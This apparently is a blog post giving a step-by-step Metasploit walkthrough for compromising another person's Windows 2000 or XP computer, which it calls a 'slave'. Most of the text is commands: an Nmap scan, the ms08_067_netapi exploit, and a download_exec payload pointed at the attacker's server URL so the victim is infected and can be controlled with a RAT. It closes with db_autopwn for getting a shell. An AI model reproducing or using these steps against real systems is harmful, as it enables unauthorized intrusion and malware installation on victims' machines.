Requirements:
Nmap
Metasploit
First of all you need target ip of your slave.
Then open Metasploit Console & type db_create.
[Use: Thisāll create or connect you to database.]
Once you do that type Nmap.
[Use: Thisāll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV
[Thisāll scan OS, Ports, and Services running on slav...eās computer.]
Wait for 5 minās to complete its scan.
Once done, Note down the OS, Ports, and Services running on slaveās computer.
Now itās time to exploit slaveās machine.
Exploit depends on the OS, Ports, and Services running on slaveās computer.
So, youāre lucky if you get OS WIN XP or 2000 because itās easy to exploit them.
No matter weather theyāre protected by any firewall or not.
Now Iāll tell you exploiting:-
Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)
Type show exploits
[Use: Thisāll show all the exploits in its database.]
Next you need to type use windows/smb/ms08_067_netapi
[Use: Thisāll select the exploit windows/smb/ms08_067_netapi]
Now Type show targets
[Use: Thisāll show all targets by exploit]
Now Type set target 0
[Use: Thisāll set target to 0 specified]
Then type show payloads
[Use: Thisāll bring up all the payloads]
Next type set payload windows/download_exec
[Use: Thisāll set payload as windows/download_exec]
Then Type show options
[Use: Thisāll show all options in the exploit & payload]
In window youāll see many options, in which you need to
Fill only two options RHOST & URL.
Type set RHOST
[Use: Thisāll set RHOST (slaveās ip) to xxx.xxx.xxx.xxx]
Next Type set URL [content suppressed]
[Use: Thisāll set URL to your direct server link.]
At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]
You can now control you're slave with RAT.
So, any versions of Win 2000-XP can be exploited easily.
In case if you didnāt get this two OSā, immediately after Nmap scan
You can use the command db_autopwn āp āt āe.
In most cases you get a shell.
Good Luck!
0 comments:
Post a Comment